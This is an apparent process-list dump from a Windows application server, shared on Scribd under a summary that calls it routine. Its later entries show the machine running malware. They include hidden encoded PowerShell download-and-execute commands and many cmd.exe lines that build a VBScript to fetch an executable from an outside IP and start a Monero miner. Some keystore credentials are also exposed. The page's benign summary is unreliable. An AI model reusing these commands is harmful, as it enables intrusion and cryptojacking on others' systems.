0% found this document useful (0 votes)

188 views15 pages

CMD Exe

This document provides a summary of processes running on a system. It lists each process name, CPU usage, memory usage, process ID and other details. Some key processes include system idle process, Windows services like svchost and spoolsv, monitoring tools like NSClient++, and Java processes running applications like Adobe LiveCycle.

Uploaded by

ovex

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

188 views15 pages

CMD Exe

Uploaded by

ovex

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 15

Process CPU Private Bytes Working Set PID Description Company Name

Command Line User Name

System Idle Process 93.08 0 K 24 K 0 NT
AUTHORITY\SYSTEM
Interrupts 0 K 0 K n/a Hardware Interrupts
DPCs 0 K 0 K n/a Deferred Procedure Calls
System 44 K 1.972 K 4 NT AUTHORITY\SYSTEM
smss.exe 0.77 400 K 448 K 348 Windows NT Session Manager Microsoft
Corporation \SystemRoot\System32\smss.exe NT AUTHORITY\SYSTEM
csrss.exe 2.544 K 3.180 K 404 Client Server Runtime Process
Microsoft Corporation C:\WINDOWS\system32\csrss.exe
ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On
SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16 NT AUTHORITY\SYSTEM
winlogon.exe 25.644 K 6.952 K 432 Windows NT Logon Application
Microsoft Corporation winlogon.exe NT AUTHORITY\SYSTEM
services.exe 6.316 K 33.428 K 484 Services and Controller app
Microsoft Corporation C:\WINDOWS\system32\services.exe NT
AUTHORITY\SYSTEM
svchost.exe 7.384 K 1.604 K 680 Generic Host Process for
Win32 Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k
DcomLaunch NT AUTHORITY\SYSTEM
wmiprvse.exe 25.804 K 12.912 K 3332 WMI Microsoft
Corporation C:\WINDOWS\system32\wbem\wmiprvse.exe NT AUTHORITY\NETWORK SERVICE
wmiprvse.exe 11.520 K 4.812 K 4380 WMI Microsoft
Corporation C:\WINDOWS\system32\wbem\wmiprvse.exe NT AUTHORITY\SYSTEM
svchost.exe 8.948 K 3.136 K 756 Generic Host Process for
Win32 Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k rpcss
NT AUTHORITY\NETWORK SERVICE
svchost.exe 13.916 K 1.800 K 824 Generic Host Process for
Win32 Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k
NetworkService NT AUTHORITY\NETWORK SERVICE
svchost.exe 6.620 K 2.428 K 844 Generic Host Process for
Win32 Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k
LocalService NT AUTHORITY\LOCAL SERVICE
svchost.exe 71.856 K 37.176 K 884 Generic Host Process for
Win32 Services Microsoft Corporation C:\WINDOWS\System32\svchost.exe -k
netsvcs NT AUTHORITY\SYSTEM
spoolsv.exe 6.376 K 3.180 K 1084 Spooler SubSystem App
Microsoft Corporation C:\WINDOWS\system32\spoolsv.exe NT
AUTHORITY\SYSTEM
msdtc.exe 4.888 K 204 K 1116 MS DTCconsole program Microsoft
Corporation C:\WINDOWS\system32\msdtc.exe NT AUTHORITY\NETWORK SERVICE
svchost.exe 4.372 K 204 K 1724 Generic Host Process for Win32
Services Microsoft Corporation C:\WINDOWS\System32\svchost.exe -k WinErr NT
AUTHORITY\SYSTEM
nscp.exe 13.060 K 1.556 K 2136 Monitoring Agent MySolutions
Nordic (Michael Medin) "C:\Program Files\NSClient++\nscp.exe" service --run --name
nscp NT AUTHORITY\SYSTEM
nsrexecd.exe 22.412 K 1.064 K 2220 EMC Corporation
D:\Legato\nsr\bin\nsrexecd.exe NT AUTHORITY\SYSTEM
nsrpm.exe 9.632 K 204 K 2400 EMC Corporation
D:\Legato\nsr\bin\nsrpm.exe NT AUTHORITY\SYSTEM
svchost.exe 1.348 K 204 K 2448 Generic Host Process for Win32
Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k regsvc NT
AUTHORITY\LOCAL SERVICE
ccSvcHst.exe 100.172 K 38.608 K 2536 Symantec Service Framework
Symantec Corporation "C:\Program Files (x86)\Symantec\Symantec Endpoint
Protection\12.1.7061.6600.105\Bin\ccSvcHst.exe" /s "Symantec Endpoint
Protection" /m "C:\Program Files (x86)\Symantec\Symantec Endpoint
Protection\12.1.7061.6600.105\Bin\sms.dll" /prefetch:1 NT AUTHORITY\SYSTEM
snmp.exe 5.548 K 1.028 K 2680 SNMP Service Microsoft
Corporation C:\WINDOWS\System32\snmp.exe NT AUTHORITY\SYSTEM
VGAuthService.exe 8.756 K 204 K 2712 VMware Guest Authentication
Service VMware, Inc. "C:\Program Files\VMware\VMware Tools\VMware
VGAuth\VGAuthService.exe" NT AUTHORITY\SYSTEM
vmtoolsd.exe 54.472 K 6.180 K 1072 VMware Tools Core Service
VMware, Inc. "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" NT
AUTHORITY\SYSTEM
pbx_exchange.exe 8.240 K 1.440 K 1712 Symantec VxPBX Binary
file Symantec Corporation "C:\Program Files
(x86)\VERITAS\VxPBX\bin\pbx_exchange.exe" NT AUTHORITY\SYSTEM
svchost.exe 4.012 K 204 K 612 Generic Host Process for Win32
Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k wecsvc NT
AUTHORITY\NETWORK SERVICE
svchost.exe 10.352 K 372 K 688 Generic Host Process for Win32
Services Microsoft Corporation C:\WINDOWS\system32\svchost.exe -k WINRM NT
AUTHORITY\NETWORK SERVICE
svchost.exe 9.912 K 3.584 K 3548 Generic Host Process for
Win32 Services Microsoft Corporation C:\WINDOWS\System32\svchost.exe -k
termsvcs NT AUTHORITY\SYSTEM
dllhost.exe 11.236 K 1.572 K 3708 COM Surrogate Microsoft
Corporation C:\WINDOWS\SYSTEM32\DLLHOST.EXE /PROCESSID:{02D4B3F1-FD88-11D1-960D-
00805FC79235} NT AUTHORITY\SYSTEM
alg.exe 6.552 K 204 K 3916 Application Layer Gateway Service
Microsoft Corporation C:\WINDOWS\System32\alg.exe NT AUTHORITY\LOCAL
SERVICE
svchost.exe 7.508 K 284 K 4048 Generic Host Process for Win32
Services Microsoft Corporation C:\WINDOWS\System32\svchost.exe -k tapisrv
NT AUTHORITY\SYSTEM
wrapper.exe 1.296 K 460 K 1844
E:\packs\wrapper_win32_3.1.2\bin\wrapper.exe -s
E:\packs\wrapper_win32_3.1.2\bin\..\conf\wrapper.conf NT AUTHORITY\SYSTEM
java.exe 159.592 K 49.268 K 6168 Java(TM) Platform SE binary
Sun Microsystems, Inc. "D:\Adobe\Adobe LiveCycle
ES2\Java\jdk1.6.0_14\bin\java" -Xms32m -Xmx384m -Djavax.net.debug=ssl,all
-Dmyorg.ssl.hostname.noverify=true
-Djavax.net.ssl.keyStore=E:/packs/openas2/config/certs.p12
-Djavax.net.ssl.keyStorePassword=test -Djavax.net.ssl.keyStoreType=pkcs12
-Djavax.net.ssl.trustStore=E:/packs/openas2/config/certs.p12
-Djavax.net.ssl.trustStorePassword=test -Djavax.net.ssl.trustStoreType=pkcs12
-Djava.library.path="../lib" -classpath
"../lib/wrappertest.jar;../lib/wrapper.jar;E:/packs/openas2/lib/activation.jar;E:/p
acks/openas2/lib/bcmail-jdk14-125.jar;E:/packs/openas2/lib/bcprov-jdk14-
125.jar;E:/packs/openas2/lib/mail.jar;E:/packs/openas2/lib/OpenAS2-
0.9.jar;E:/packs/openas2/lib/openas2-lib.jar" -Dwrapper.key="kBLYFKhXzcp_kqhH"
-Dwrapper.port=32000 -Dwrapper.use_system_time="TRUE" -Dwrapper.version="3.1.2"
-Dwrapper.native_library="wrapper" -Dwrapper.service="TRUE"
-Dwrapper.cpu.timeout="10" -Dwrapper.jvmid=1
org.tanukisoftware.wrapper.WrapperSimpleApp org.openas2.app.OpenAS2Server
E:/packs/openas2/config/config.xml NT AUTHORITY\SYSTEM
vnetd.exe 2.504 K 2.180 K 1644 Symantec Corporation
"C:\Program Files\Veritas\NetBackup\bin\vnetd.exe" -standalone NT
AUTHORITY\SYSTEM
bpinetd.exe 17.636 K 4.516 K 6288 Symantec Corporation
"C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe" NT AUTHORITY\SYSTEM
nbdisco.exe 17.956 K 11.360 K 4820 Symantec Corporation
"C:\Program Files\Veritas\NetBackup\bin\nbdisco.exe" NT AUTHORITY\SYSTEM
mtstrmd.exe 2.884 K 708 K 5936 NetBackup Deduplication Multi-
Threaded Agent Symantec Corporation "C:\Program
Files\Veritas\pdde\mtstrmd.exe" --config "C:\Program
Files\Veritas\NetBackup\bin\ost-plugins\mtstrm.conf" NT AUTHORITY\SYSTEM
bpcd.exe 3.808 K 2.244 K 6844 Symantec Corporation
"C:\Program Files\Veritas\NetBackup\bin\bpcd.exe" -standalone NT
AUTHORITY\SYSTEM
BBWin.exe 4.824 K 5.104 K 1472 BBWin core service GNU
"C:\Program Files (x86)\BBWin\bin\BBWin.exe" NT AUTHORITY\SYSTEM
cscript.exe 5.968 K 9.444 K 5848 Microsoft (r) Console Based
Script Host Microsoft Corporation cscript //T:240 ../ext/timediff.vbs NT
AUTHORITY\SYSTEM
cmd.exe 1.508 K 1.268 K 6608 Windows Command Processor
Microsoft Corporation "C:\WINDOWS\system32\cmd.exe" /c ""C:\Program Files
(x86)\BBWin\tools\cmdtime.exe" /W:5000 10.39.5.255 ""> "C:\Program Files
(x86)\BBWin\tmp\timediff.txt" NT AUTHORITY\SYSTEM
vssvc.exe 1.848 K 976 K 6412 Microsoft� Volume Shadow Copy
Service Microsoft Corporation C:\WINDOWS\System32\vssvc.exe NT
AUTHORITY\SYSTEM
CerberusGUI.exe 63.592 K 31.752 K 4336 Cerberus FTP Server
application Cerberus, LLC "D:\Cerberus LLC\Cerberus FTP Server\CerberusGUI.exe"
-Service NT AUTHORITY\SYSTEM
jbosssvc.exe 696 K 1.868 K 7756 JBoss Service wrapper Red Hat�,
Inc. "D:\Adobe\Adobe LiveCycle ES2\jboss\bin\jbosssvc.exe" -r
JBOSS_FOR_ADOBE_LIVECYCLE_ES2 NT AUTHORITY\SYSTEM
cmd.exe 1.988 K 2.576 K 2124 Windows Command Processor
Microsoft Corporation C:\WINDOWS\system32\cmd.exe /E:ON /S /C "SET
JSERVICE_PPID=7756&&SET JSERVICE_NAME=JBOSS_FOR_ADOBE_LIVECYCLE_ES2&&CALL
service.bat start" NT AUTHORITY\SYSTEM
java.exe 1.935.508 K 591.828 K 5036 Java(TM) Platform SE binary
Sun Microsystems, Inc. "d:\Adobe\Adobe LiveCycle
ES2/Java/jdk1.6.0_14\bin\java" -Xrs -Dadobeidp.serverName=server1
-Dfile.encoding=utf8 -Djava.net.preferIPv4Stack=true -Dprogram.name=run.bat -server
-XX:PermSize=256m -XX:MaxPermSize=384m -Xms1536m -Xmx2816m -XX:+UseCompressedOops
-Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 "-
Djava.endorsed.dirs=D:\Adobe\Adobe LiveCycle ES2\jboss\lib\endorsed" -classpath
"d:\Adobe\Adobe LiveCycle ES2/Java/jdk1.6.0_14\lib\tools.jar;D:\Adobe\Adobe
LiveCycle ES2\jboss\bin\run.jar" org.jboss.Main -c lc_turnkey -b 0.0.0.0 NT
AUTHORITY\SYSTEM
cmd.exe 1.912 K 2.288 K 4228 Windows Command Processor
Microsoft Corporation cmd /c powershell.exe -NonI -W Hidden -NoP -Exec
Bypass -Enc
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgB
EAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQA3ADcALgAxAD
IAMwAuADEAMgAzAC8AYwBzAHMALwBiAG8AbwB0AHMAdAByAGEAcAAuAGMAcwBzACIAKQA= NT
AUTHORITY\SYSTEM
powershell.exe 62.708 K 57.632 K 5276 Windows PowerShell
Microsoft Corporation powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgB
EAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQA3ADcALgAxAD
IAMwAuADEAMgAzAC8AYwBzAHMALwBiAG8AbwB0AHMAdAByAGEAcAAuAGMAcwBzACIAKQA= NT
AUTHORITY\SYSTEM
cmd.exe 1.912 K 2.260 K 5920 Windows Command Processor
Microsoft Corporation cmd /c powershell.exe -NonI -W Hidden -NoP -Exec
Bypass -Enc
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgB
EAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQA3ADcALgAxAD
IAMwAuADEAMgAzAC8AYwBzAHMALwBiAG8AbwB0AHMAdAByAGEAcAAuAGMAcwBzACIAKQA= NT
AUTHORITY\SYSTEM
powershell.exe 62.688 K 57.732 K 4828 Windows PowerShell
Microsoft Corporation powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgB
EAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQA3ADcALgAxAD
IAMwAuADEAMgAzAC8AYwBzAHMALwBiAG8AbwB0AHMAdAByAGEAcAAuAGMAcwBzACIAKQA= NT
AUTHORITY\SYSTEM
lsass.exe 12.080 K 5.304 K 496 LSA Shell Microsoft
Corporation C:\WINDOWS\system32\lsass.exe NT AUTHORITY\SYSTEM
winlogon.exe 7.156 K 204 K 3764 Windows NT Logon Application
Microsoft Corporation winlogon.exe NT AUTHORITY\SYSTEM
logon.scr 1.964 K 288 K 5484 Logon Screen Saver Microsoft
Corporation logon.scr /s NT AUTHORITY\LOCAL SERVICE
csrss.exe 1.924 K 200 K 4708 Client Server Runtime Process
Microsoft Corporation C:\WINDOWS\system32\csrss.exe
ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On
SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16 NT AUTHORITY\SYSTEM
winlogon.exe 5.740 K 4.788 K 1508 Windows NT Logon Application
Microsoft Corporation winlogon.exe NT AUTHORITY\SYSTEM
rdpclip.exe 1.804 K 5.908 K 7548 RDP Clip Monitor Microsoft
Corporation rdpclip TESLA-AS06\lantonelli
csrss.exe 1.792 K 3.876 K 7304 Client Server Runtime Process
Microsoft Corporation C:\WINDOWS\system32\csrss.exe
ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On
SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16 NT AUTHORITY\SYSTEM
winlogon.exe 4.796 K 4.684 K 3468 Windows NT Logon Application
Microsoft Corporation winlogon.exe NT AUTHORITY\SYSTEM
rdpclip.exe 1.792 K 5.932 K 5216 RDP Clip Monitor Microsoft
Corporation rdpclip TESLA-AS06\alia
csrss.exe 1.808 K 4.004 K 5992 Client Server Runtime Process
Microsoft Corporation C:\WINDOWS\system32\csrss.exe
ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On
SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16 NT AUTHORITY\SYSTEM
csrss.exe 1.52 1.640 K 3.392 K 4120 Client Server Runtime Process
Microsoft Corporation C:\WINDOWS\system32\csrss.exe
ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On
SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16 NT AUTHORITY\SYSTEM
winlogon.exe 0.76 2.652 K 8.016 K 5252 Windows NT Logon Application
Microsoft Corporation winlogon.exe NT AUTHORITY\SYSTEM
csrss.exe 1.54 1.640 K 3.392 K 6620 Client Server Runtime Process
Microsoft Corporation C:\WINDOWS\system32\csrss.exe
ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On
SubSystemType=Windows ServerDll=basesrv,1
ServerDll=winsrv:UserServerDllInitialization,3
ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16 NT AUTHORITY\SYSTEM
winlogon.exe 2.31 2.652 K 8.012 K 7728 Windows NT Logon Application
Microsoft Corporation winlogon.exe NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 1460 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 4960 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 5828 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 5148 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 5472 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 4564 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 6088 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 1456 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 2456 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 224 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 388 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 5620 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.072 K 208 K 3892 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
